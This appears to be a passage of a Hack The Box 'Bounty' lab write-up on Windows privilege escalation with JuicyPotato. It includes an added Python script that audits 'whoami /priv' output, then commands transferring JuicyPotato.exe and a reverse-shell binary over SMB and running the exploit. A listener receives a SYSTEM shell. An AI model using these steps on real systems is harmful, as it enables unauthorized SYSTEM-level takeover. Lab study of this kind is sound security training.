JuicyPotato


JuicyPotato is a notorious privilege escalation path for any account that holds the ==SeImpersonate or SeAssignPrimaryToken== privilege
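A quick way for an administrator to audit whether an account meets that precondition, as an added example that is not part of the original writeup: the script below parses the output of `whoami /priv` (a constructed sample is embedded, not output from this target) and reports which of the two privileges the token holds.

```python
"""Audit a token's `whoami /priv` output for the JuicyPotato precondition.

Added example, not part of the original writeup: it reports whether the
account holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.
"""
from __future__ import annotations

# The two privileges that make an account a JuicyPotato candidate.
JUICY_PRIVS = ("SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege")

# Constructed sample of `whoami /priv` output for a service-style account;
# not captured from the target on this page.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Return {privilege name: state} from `whoami /priv` output."""
    privs: dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):  # separator under the column headers
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # First column is the privilege name, last is Enabled/Disabled;
        # the free-text description in between is ignored.
        privs[parts[0]] = parts[-1]
    return privs


def juicy_potato_exposure(text: str) -> list[str]:
    """List the JuicyPotato-enabling privileges present in the token.

    Reported whether Enabled or Disabled: a disabled privilege is still
    held by the token and can be enabled by the process, so only its
    absence removes the exposure.
    """
    privs = parse_whoami_priv(text)
    return [p for p in JUICY_PRIVS if p in privs]
```

Run it against `whoami /priv` captured from each service or application-pool account; an empty result means the account is not a JuicyPotato candidate.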

c:\temp> copy \\10.10.14.5\smb\JuicyPotato.exe
        1 file(s) copied.
 
c:\temp> copy \\10.10.14.5\smb\pe.exe
        1 file(s) copied.

I transferred the exploit and reverse shell to the target machine over SMB

c:\temp> .\JuicyPotato.exe
JuicyPotato v0.1 
 
mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
 
 
optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

JuicyPotato provides a help menu

The command would be something like this:

.\juicypotato.exe -t * -p "c:\temp\pe.exe" -l 7729

  • -t * to try both CreateProcessWithTokenW and CreateProcessAsUser
  • -p to launch the reverse shell program (pe.exe) with higher privileges upon successful exploitation
  • -l to pick an arbitrary port for the COM server to listen on

c:\temp> .\JuicyPotato.exe -t * -p "C:\temp\pe.exe" -l 7729
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7729
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

The exploit tested the CLSID {4991d34b-80a1-4291-83b6-3328366b9097}

It is the COM object named “Background Intelligent Transfer Control Class 1.0”, hosted by BITS (Background Intelligent Transfer Service), which runs as NT AUTHORITY\SYSTEM

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ nnc 1231
listening on [any] 1231 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49232
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32>whoami
nt authority\system
 
c:\Windows\system32>hostname
bounty
 
c:\Windows\system32>ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.93
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{27c3f487-28ac-4ce6-ae3a-1f23518ef7a7}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 

And sure enough, JuicyPotato launched c:\temp\pe.exe: the reverse shell came through

System Level Compromise